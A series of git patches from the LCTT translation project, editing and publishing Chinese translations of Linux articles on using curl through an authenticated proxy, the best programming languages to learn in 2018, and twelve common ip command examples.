+++ b/published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
@@ -1,8 +1,8 @@
-translating by lujun9972
如何让 curl 命令通过代理访问
======
我的系统管理员给我提供了如下代理信息:
+
```
IP: 202.54.1.1
Port: 3128
@@ -10,14 +10,16 @@ Username: foo
Password: bar
```
-该设置在 Google Chrome 和 Firefox 浏览器上很容易设置。但是我要怎么把它应用到 curl 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
+该设置在 Google Chrome 和 Firefox 浏览器上很容易设置。但是我要怎么把它应用到 `curl` 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
-很多 Linux 和 Unix 命令行工具(比如 curl 命令,wget 命令,lynx 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。**本文就会演示一下如何让 curl 通过代理服务器发送 HTTP/HTTPS 请求。**
+很多 Linux 和 Unix 命令行工具(比如 `curl` 命令,`wget` 命令,`lynx` 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。
-## 让 curl 命令使用代理的语法
+本文就会演示一下如何让 `curl` 通过代理服务器发送 HTTP/HTTPS 请求。
+### 让 curl 命令使用代理的语法
语法为:
+
```
## Set the proxy address of your uni/company/vpn network ##
export http_proxy=http://your-ip-address:port/
@@ -30,8 +32,8 @@ export https_proxy=https://your-ip-address:port/
export https_proxy=https://user:password@your-proxy-ip-address:port/
```
+另一种方法是使用 `curl` 命令的 `-x` 选项:
-另一种方法是使用 curl 命令的 -x 选项:
```
curl -x <[protocol://][user:password@]proxyhost[:port]> url
--proxy <[protocol://][user:password@]proxyhost[:port]> url
@@ -39,9 +41,10 @@ curl -x <[protocol://][user:password@]proxyhost[:port]> url
-x http://user:password@Your-Ip-Here:Port url
```
-## 在 Linux 上的一个例子
+### 在 Linux 上的一个例子
首先设置 `http_proxy`:
+
```
## proxy server, 202.54.1.1, port: 3128, user: foo, password: bar ##
export http_proxy=http://foo:bar@202.54.1.1:3128/
@@ -50,6 +53,7 @@ export https_proxy=$http_proxy
curl -I https://www.cyberciti.biz
curl -v -I https://www.cyberciti.biz
```
+
输出为:
```
@@ -98,42 +102,54 @@ Connection: keep-alive
```
本例中,我来下载一个 pdf 文件:
+
```
$ export http_proxy="vivek:myPasswordHere@10.12.249.194:3128/"
$ curl -v -O http://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-也可以使用 -x 选项:
+
+也可以使用 `-x` 选项:
+
```
curl -x 'http://vivek:myPasswordHere@10.12.249.194:3128' -v -O https://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-输出为:
-![Fig.01:curl in action \(click to enlarge\)][1]
-## Unix 上的一个例子
+输出为:
+
+![Fig.01:curl in action \(click to enlarge\)][2]
+
+### Unix 上的一个例子
```
$ curl -x http://prox_server_vpn:3128/ -I https://www.cyberciti.biz/faq/howto-nginx-customizing-404-403-error-page/
```
-## socks 协议怎么办呢?
+### socks 协议怎么办呢?
语法也是一样的:
+
```
curl -x socks5://[user:password@]proxyhost[:port]/ url
curl --socks5 192.168.1.254:3099 https://www.cyberciti.biz/
```
-## 如何让代理设置永久生效?
+### 如何让代理设置永久生效?
+
+编辑 `~/.curlrc` 文件:
+
+```
+$ vi ~/.curlrc
+```
-编辑 ~/.curlrc 文件:
-`$ vi ~/.curlrc`
添加下面内容:
+
```
proxy = server1.cyberciti.biz:3128
proxy-user = "foo:bar"
```
保存并关闭该文件。另一种方法是在你的 `~/.bashrc` 文件中创建一个别名:
+
```
## alias for curl command
## set proxy-server and port, the syntax is
@@ -141,7 +157,7 @@ proxy-user = "foo:bar"
alias curl="curl -x server1.cyberciti.biz:3128"
```
-记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`,`socks4a://`,`socks5:// `或者 `socks5h://` 来指定使用的 SOCKS 版本。若没有指定协议或者 `http://` 表示 HTTP 协议。若没有指定端口号则默认为 1080。-x 选项的值要优先于环境变量设置的值。若不想走代理,而环境变量总设置了代理,那么可以通过设置代理为 "" 来覆盖环境变量的值。[详细信息请参阅 curl 的 man 页 ][3]。
+记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`,`socks4a://`,`socks5:// `或者 `socks5h://` 来指定使用的 SOCKS 版本。若没有指定协议或者使用 `http://` 表示 HTTP 协议。若没有指定端口号则默认为 `1080`。`-x` 选项的值要优先于环境变量设置的值。若不想走代理,而环境变量总设置了代理,那么可以通过设置代理为空值(`""`)来覆盖环境变量的值。[详细信息请参阅 `curl` 的 man 页 ][3]。
--------------------------------------------------------------------------------
@@ -150,11 +166,11 @@ via: https://www.cyberciti.biz/faq/linux-unix-curl-command-with-proxy-username-p
作者:[Vivek Gite][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/media/new/faq/2016/01/curl-download-output-300x141.jpg
-[2]:https://www.cyberciti.biz//www.cyberciti.biz/media/new/faq/2016/01/curl-download-output.jpg
+[2]:https://www.cyberciti.biz/media/new/faq/2016/01/curl-download-output.jpg
[3]:https://curl.haxx.se/docs/manpage.html
From 91fe77cf462a07e56c612ea2459c591690e9ae49 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 22:15:40 +0800
Subject: [PATCH 203/371] PRF&PUB:20171227 Best Programming Languages To Learn
In 2018.md
@qhwdw
---
... Programming Languages To Learn In 2018.md | 39 +++++++------------
1 file changed, 14 insertions(+), 25 deletions(-)
rename {translated/tech => published}/20171227 Best Programming Languages To Learn In 2018.md (75%)
diff --git a/translated/tech/20171227 Best Programming Languages To Learn In 2018.md b/published/20171227 Best Programming Languages To Learn In 2018.md
similarity index 75%
rename from translated/tech/20171227 Best Programming Languages To Learn In 2018.md
rename to published/20171227 Best Programming Languages To Learn In 2018.md
index 5365a9076e..9b6a4a286e 100644
--- a/translated/tech/20171227 Best Programming Languages To Learn In 2018.md
+++ b/published/20171227 Best Programming Languages To Learn In 2018.md
@@ -3,17 +3,16 @@
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-programming-languages-learn-for-2018_orig.jpg)
-编程现在已经变成最受欢迎的职业之一,不像以前,编制软件只局限于少数几种**编程语言**。现在,我们有很多种编程语言可以选择。随着跨平台支持需求的增多,大多数编程语言都可以被用于多种任务。如果,你还没有准备好,让我们看一下在 2018 年你可能会学习的编程语言有哪些。
+编程现在已经变成最受欢迎的职业之一,不像以前,编制软件只局限于少数几种**编程语言**。现在,我们有很多种编程语言可以选择。随着跨平台支持的增多,大多数编程语言都可以被用于多种任务。如果,你还没有学会编程,让我们看一下在 2018 年你可能会学习的编程语言有哪些。
-## 在 2018 年最值得去学习的编程语言
### Python
[![learn programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/learn-programming-language_orig.png)][1]
-毫无疑问, [Python][2] 现在已经统治着(ruling)编程的市场份额。它发起于 1991 年,自从 [YouTube][3] 开始使用它之后,python 已经真正的成为最著名的编程语言。Python 可以被用于各类领域,比如,Web 开发、游戏开发、脚本、科学研究、以及大多数你能想到的领域。它是跨平台的,并且运行在一个解释程序中。Python 的语法非常简单,因为它使用缩进代替花括号来对代码块进行分组,因此,代码非常清晰。
+毫无疑问, [Python][2] 现在已经统治着编程市场。它发起于 1991 年,自从 [YouTube][3] 开始使用它之后,Python 已经真正的成为著名编程语言。Python 可以被用于各类领域,比如,Web 开发、游戏开发、脚本、科学研究、以及大多数你能想到的领域。它是跨平台的,并且运行在一个解释程序中。Python 的语法非常简单,因为它使用缩进代替花括号来对代码块进行分组,因此,代码非常清晰。
-**示例 -**
+**示例:**
```
print("Hello world!")
@@ -23,27 +22,21 @@ printf("Hello world!")
[![kotlin programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/kotlin-programming-language_orig.jpg)][4]
-虽然 Java 自它诞生以来从没有被超越过,但是,至少在 Android 编程方面,Kotlin 在正打破这种局面。Kotlin 是较新的一个编程语言,它被 Google 官方支持用于Android 应用编程。它是 Java 的替代者,并且可以与 [java][5] 代码无缝衔接。代码大幅减少并且更加清晰。因此,在 2018 年,Kotlin 将是最值的去学习的编程语言。
+虽然 Java 自它诞生以来从没有被超越过,但是,至少在 Android 编程方面,Kotlin 在正打破这种局面。Kotlin 是较新的一个编程语言,它被 Google 官方支持用于 Android 应用编程。它是 Java 的替代者,并且可以与 [java][5] 代码无缝衔接。代码大幅减少并且更加清晰。因此,在 2018 年,Kotlin 将是最值的去学习的编程语言。
-**示例 -**
+**示例**
```
class Greeter(val name: String) {
-
fun greet() {
-
println("Hello, $name")
-
}
-
}
-String Interpolation to cut down ceremony.
+// String Interpolation to cut down ceremony.
fun main(args: Array<String>) {
-
Greeter(args[0]).greet()
-
}
```
@@ -51,19 +44,15 @@ fun main(args: Array) {
这可能是他们在中学和大学里教的第一个编程语言。C 是比较老的编程语言之一,由于它的代码运行速度快而且简单,它到现在仍然一直被使用。虽然它的学习难度比较大,但是,一旦你掌握了它,你就可以做任何语言能做的事情。你可能不会用它去做高级的网站或者软件,但是,C 是嵌入式设备的首选编程语言。随着物联网的普及,C 将被再次广泛的使用,对于 C++,它被广泛用于一些大型软件。
-**示例 -**
+**示例**
```
-#include
+#include <stdio.h>
int main()
-
{
-
printf("Hello world");
-
return 0;
-
}
```
@@ -73,7 +62,7 @@ Int main()
关于 PHP 即将消亡的话题,因特网上正在疯传,但是,我没有看到一个为什么不去学习 PHP 的理由,它是服务器端脚本语言中比较优秀的一个,它的语法结构非常简单。一半以上的因特网都运行在 PHP 上。[Wordpress][7],这个最流行的内容管理系统是用 PHP 写的。因为,这个语言流行的时间已经超过 20 年了,它已经有了足够多的库。在这些库中,你总能找到一个是适合你的工作的。
-**示例 -**
+**示例**
```
echo "Hello world!";
@@ -83,9 +72,9 @@ echo "Hello world!";
![javascript programming language for web](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/javascript_orig.png)
-关于 Javascript,我说些什么呢?这是目前最为需要的语言。Javascript 主要用于网站动态生成页面。但是,现在 JavaScript 已经演进到可以做更多的事情。全部的后端框架都是用 JavaScript 构建的。Hybrid 应用是用 HTML+JS 写的,它被用于构建任何移动端的平台。使用 Javascript 的 nodejs 甚至被用于服务器端的脚本。
+关于 Javascript,我说些什么呢?这是目前最为需要的语言。Javascript 主要用于网站动态生成页面。但是,现在 JavaScript 已经演进到可以做更多的事情。整个前后端框架都可以用 JavaScript 构建。Hybrid 应用是用 HTML+JS 写的,它被用于构建任何移动端的平台。使用 Javascript 的 nodejs 甚至被用于服务器端的脚本。
-**示例 -**
+**示例**
```
document.write("Hello world!");
@@ -95,9 +84,9 @@ document.write("Hello world!");
[![sql database language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/sql-database-language.png?1514386856)][8]
-SQL 是一个关系型数据库管理系统(RDBMS)的查询语言,它用于从数据库中获取数据。SQL 的主要实现或多或少都是非常相似的。数据库用途非常广泛。你读的这篇文章它就保存在我们网站的数据库中。因此,学会它是非常有用的。
+SQL 是关系型数据库管理系统(RDBMS)的查询语言,它用于从数据库中获取数据。SQL 的主要实现或多或少都是非常相似的。数据库用途非常广泛。你读的这篇文章它就保存在我们网站的数据库中。因此,学会它是非常有用的。
-**示例 -**
+**示例**
```
SELECT * FROM TABLENAME
@@ -113,7 +102,7 @@ via: http://www.linuxandubuntu.com/home/best-programming-languages-to-learn-in-2
作者:[LinuxAndUbuntu][a]
译者:[qhwdw](https://github.com/qhwdw)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From f99dc52e018ea4c3da123a5aa929f9082361e6cc Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 23:04:13 +0800
Subject: [PATCH 204/371] translate done: 20170915 12 ip Command Examples for
Linux Users.md
---
... 12 ip Command Examples for Linux Users.md | 196 ------------------
... 12 ip Command Examples for Linux Users.md | 195 +++++++++++++++++
2 files changed, 195 insertions(+), 196 deletions(-)
delete mode 100644 sources/tech/20170915 12 ip Command Examples for Linux Users.md
create mode 100644 translated/tech/20170915 12 ip Command Examples for Linux Users.md
diff --git a/sources/tech/20170915 12 ip Command Examples for Linux Users.md b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
deleted file mode 100644
index ded3be8f3b..0000000000
--- a/sources/tech/20170915 12 ip Command Examples for Linux Users.md
+++ /dev/null
@@ -1,196 +0,0 @@
-translating by lujun9972
-12 ip Command Examples for Linux Users
-======
-For years & years we have been using ' **ifconfig** ' command to perform network related tasks like checking network interfaces or configuring them. But 'ifconfig' is no longer being maintained & has been deprecated on the recent versions of Linux. 'ifconfig' command has been replaced with ' **ip** ' command.
-
-'ip' command is somewhat similar to 'ifconfig' command but it's much more powerful with much more functionalities attached to it. 'ip' command is able to perform several tasks which were not possible to perform with 'ifconfig' command.
-
-[![IP-command-examples-Linux][1]![IP-command-examples-Linux][2]][3]
-
-In this tutorial, we are going to discuss 12 most common uses for 'ip' command, so let's get going,
-
-#### Example 1: Checking network information for interfaces ( LAN Cards )
-
-To check the network information like IP address, Subnet etc for the interfaces, use 'ip addr show' command
-```
-[linuxtechi@localhost]$ ip addr show
-
-or
-
-[linuxtechi@localhost]$ ip a s
-```
-
-This will show network information related to all interfaces available on our system, but if we want to view same information for single interface, command is
-```
-[linuxtechi@localhost]$ ip addr show enp0s3
-```
-
-where enp0s3 is the name of the interface.
-
-[![IP-addr-show-commant-output][1]![IP-addr-show-commant-output][4]][5]
-
-#### Example 2: Enabling & disabling a network interface
-
-To enable a disable network interface, 'ip' command used is
-```
-[linuxtechi@localhost]$ sudo ip link set enp0s3 up
-```
-
-& to disable the network interface we will use 'down' trigger,
-```
-[linuxtechi@localhost]$ sudo ip link set enp0s3 down
-```
-
-#### Example 3: Assigning IP address & other network information to an interface
-
-To assign IP address to interface, we will use
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
-```
-
-We can also set broadcast address to interface with 'ip' command. By default no broadcast address is set, so to set a broadcast address command is
-```
-[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
-```
-
-We can also set standard broadcast address along with IP address by using the following command,
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
-```
-
-As shown in the above example, we can also use 'brd' in place on 'broadcast' to set broadcast ip address.
-
-#### Example 4: Removing IP address from interface
-
-If we want to flush or remove the assigned IP from interface, then the beneath ip command
-```
-[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
-```
-
-#### Example 5: Adding an Alias for an interface (enp0s3)
-
-To add an alias i.e. assign more than one IP to an interface, execute below command
-```
-[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
-```
-
-[![ip-command-add-alias-linux][1]![ip-command-add-alias-linux][6]][7]
-
-#### Example 6: Checking route or default gateway information
-
-Checking routing information shows us the route a packet will take to reach the destination. To check the network routing information, execute the following command,
-```
-[linuxtechi@localhost]$ ip route show
-```
-
-[![ip-route-command-output][1]![ip-route-command-output][8]][9]
-
-In the output we will see the routing information for packets for all the network interfaces. We can also get the routing information to a particular ip using,
-```
-[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
-```
-
-#### Example 7: Adding a static route
-
-If we want to change the default route taken by packets, we can do so with IP command. To assign a default gateway, use following 'ip route' command
-```
-[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
-```
-
-So now all network packets will travel via 192.168.0.150 as opposed to old default route. For changing the default route for a single interface & to make change route further, execute
-```
-[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
-```
-
-#### Example 8: Removing a static route
-
-To remove the a previously changes default route, open terminal & run,
-```
-[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
-```
-
-**Note:-** Changes made to default route using the above mentioned commands are only temporary & all changes will be lost after a system has been restarted. To make a persistence route change, we need to modify / create route-enp0s3 file . Add the following line to it, demonstration is shown below
-```
-[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
-
-172.16.32.32 via 192.168.0.150/24 dev enp0s3
-```
-
-Save and Exit the file.
-
-If you are using Ubuntu or debian based OS, than the location of the file is ' **/etc/network/interfaces** ' and add the line "ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3" to the bottom of the file.
-
-#### Example 9: Checking all ARP entries
-
-ARP, short for ' **Address Resolution Protocol** ' , is used to convert an IP address to physical address (also known as MAC address) & all the IP and their corresponding MAC details are stored in a table known as ARP cache.
-
-To view entries in ARP cache i.e. MAC addresses of the devices connected in LAN, the IP command used is
-```
-[linuxtechi@localhost]$ ip neigh
-```
-
-[![ip-neigh-command-linux][1]![ip-neigh-command-linux][10]][11]
-
-#### Example 10: Modifying ARP entries
-
-To delete an ARP entry, the command used is
-```
-[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
-```
-
-or if we want to add a new entry to ARP cache, the command is
-```
-[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
-```
-
-where **nud** means **neighbour state** , it can be
-
- * **perm** - permanent & can only be removed by administrator,
- * **noarp** - entry is valid but can be removed after lifetime expires,
- * **stale** - entry is valid but suspicious,
- * **reachable** - entry is valid until timeout expires.
-
-
-
-#### Example 11: Checking network statistics
-
-With 'ip' command we can also view the network statistics like bytes and packets transferred, errors or dropped packets etc for all the network interfaces. To view network statistics, use ' **ip -s link** ' command
-```
-[linuxtechi@localhost]$ ip -s link
-```
-
-[![ip-s-command-linux][1]![ip-s-command-linux][12]][13]
-
-#### Example 12: How to get help
-
-If you want to find a option which is not listed in above examples, then you can look for help. In Fact you can use help for all the commands. To list all available options that can be used with 'ip' command, use
-```
-[linuxtechi@localhost]$ ip help
-```
-
-Remember that 'ip' command is very important command for Linux admins and it should be learned and mastered to configure network with ease. That's it for now, please do provide your suggestions & leave your queries in the comment box below.
-
---------------------------------------------------------------------------------
-
-via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
-
-作者:[Pradeep Kumar][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linuxtechi.com/author/pradeep/
-[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
-[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
-[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
-[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
-[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
-[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
-[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
-[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
-[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
-[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
-[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
-[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
-[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
diff --git a/translated/tech/20170915 12 ip Command Examples for Linux Users.md b/translated/tech/20170915 12 ip Command Examples for Linux Users.md
new file mode 100644
index 0000000000..3fe629852b
--- /dev/null
+++ b/translated/tech/20170915 12 ip Command Examples for Linux Users.md
@@ -0,0 +1,195 @@
+Linux 用户的 12 个 ip 命令案例
+======
+多年来我们一直使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护并且在最近版本的 Linux 中被废除了。`ifconfig` 命令已经被 `ip` 命令所替代了。
+
+`ip` 命令跟 `ifconfig` 命令有些类似,但要强大得多,它有许多新功能。`ip` 命令能完成很多 `ifconfig` 命令无法完成的任务。
+
+![IP-command-examples-Linux][2]
+
+本教程将会讨论 `ip` 命令的 12 种最常见的用法,让我们开始吧。
+
+### 案例 1:检查网卡信息
+
+要查看网卡的 IP 地址、子网等网络信息,使用 `ip addr show` 命令
+```
+[linuxtechi@localhost]$ ip addr show
+
+or
+
+[linuxtechi@localhost]$ ip a s
+```
+
+这会显示系统中所有可用网卡的相关网络信息,不过如果你想查看某块网卡的信息,则命令为
+```
+[linuxtechi@localhost]$ ip addr show enp0s3
+```
+
+这里 `enp0s3` 是网卡的名字。
+
+![IP-addr-show-commant-output][4]
+
+### 案例 2:启用/禁用网卡
+
+使用 `ip` 命令来启用一个被禁用的网卡
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 up
+```
+
+而要禁用网卡则使用 `down` 触发器,
+```
+[linuxtechi@localhost]$ sudo ip link set enp0s3 down
+```
+
+### 案例 3:为网卡分配 IP 地址以及其他网络信息
+
+要为网卡分配 IP 地址,我们使用下面命令
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
+```
+
+也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为
+```
+[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
+```
+
+我们也可以使用下面命令来根据 IP 地址设置标准的广播地址,
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
+```
+
+如上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
+
+### 案例 4:删除网卡中配置的 IP 地址
+
+若想从网卡中删掉某个 IP,使用如下 ip 命令
+```
+[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
+```
+
+### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+
+添加别名,即为网卡添加不止一个 IP,执行下面命令
+```
+[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
+```
+
+![ip-command-add-alias-linux][6]
+
+### 案例 6:检查路由/默认网关的信息
+
+查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令,
+```
+[linuxtechi@localhost]$ ip route show
+```
+
+![ip-route-command-output][8]
+
+在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 ip 的路由信息,方法是,
+```
+[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
+```
+
+### 案例 7:添加静态路由
+
+我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令
+```
+[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
+```
+
+这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行
+```
+[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+### 案例 8:删除默认路由
+
+要删除之前设置的默认路由,打开终端然后运行,
+```
+[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
+```
+
+**注意:-** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改/创建 `route-enp0s3` 文件。将下面这行加入其中
+```
+[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
+
+172.16.32.32 via 192.168.0.150/24 dev enp0s3
+```
+
+保存并退出该文件。
+
+若你使用的是基于 Ubuntu 或 debian 的操作系统,则该要修改的文件为 `/etc/network/interfaces`,然后添加 `ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3` 这行到文件末尾。
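+
+下面是一个示意性的写法(网卡名和地址沿用上文的示例;在多数 Debian/Ubuntu 系统上,这类静态路由通常放在对应的 iface 段落里,用 `post-up` 在网卡启动后添加):
+```
+# /etc/network/interfaces(仅为示意)
+auto enp0s3
+iface enp0s3 inet static
+    address 192.168.0.10
+    netmask 255.255.255.0
+    gateway 192.168.0.1
+    # 每次网卡启动后重新添加这条静态路由
+    post-up ip route add 172.16.32.32 via 192.168.0.150 dev enp0s3
+```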
+
+### 案例 9:检查所有的 ARP 记录
+
+ARP,即 `Address Resolution Protocol`(地址解析协议)的缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+
+要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令
+```
+[linuxtechi@localhost]$ ip neigh
+```
+
+![ip-neigh-command-linux][10]
+
+### 案例 10:修改 ARP 记录
+
+删除 ARP 记录的命令为
+```
+[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
+```
+
+若想往 ARP 缓存中添加新记录,则命令为
+```
+[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:16:75:37:f3:84 dev enp0s3 nud perm
+```
+
+这里 **nud** 的意思是 **neighbour state**(邻居状态),它的值可以是下面几种(列表之后附有一个按状态过滤记录的小例子):
+
+ * **perm** - 永久有效并且只能被管理员删除
+ * **noarp** - 记录有效,但在生命周期过期后就允许被删除了
+ * **stale** - 记录有效,但可能已经过期,
+ * **reachable** - 记录有效,但超时后就失效了。
+
+
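+例如,可以按上述状态来过滤 ARP 记录(这里沿用前文的网卡名 enp0s3 作为示例):
+```
+[linuxtechi@localhost]$ ip neigh show nud reachable
+[linuxtechi@localhost]$ ip neigh show dev enp0s3 nud stale
+```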
+
+### 案例 11:查看网络统计信息
+
+通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看
+```
+[linuxtechi@localhost]$ ip -s link
+```
+
+![ip-s-command-linux][12]
+
+### 案例 12:获取帮助
+
+若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行
+```
+[linuxtechi@localhost]$ ip help
+```
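+
+每个子命令也有自己的帮助信息,例如查看路由相关选项的用法:
+```
+[linuxtechi@localhost]$ ip route help
+```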
+
+记住,`ip` 命令是一个对 Linux 系统管理来说特别重要的命令,学习并掌握它能够让配置网络变得容易。本教程就此结束了,若有任何建议欢迎在下面留言框中留言。
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
+
+作者:[Pradeep Kumar][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxtechi.com/author/pradeep/
+[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
+[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
From 3be4336d9479f61be0ab3ded3809e6cbb80cc38a Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Tue, 9 Jan 2018 23:38:26 +0800
Subject: [PATCH 205/371] Drshu translating
---
...0170915 Fake A Hollywood Hacker Screen in Linux Terminal.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
index f826ac57f0..5c147692bc 100644
--- a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -1,5 +1,8 @@
+Translating by Drshu
+
Fake A Hollywood Hacker Screen in Linux Terminal
======
+
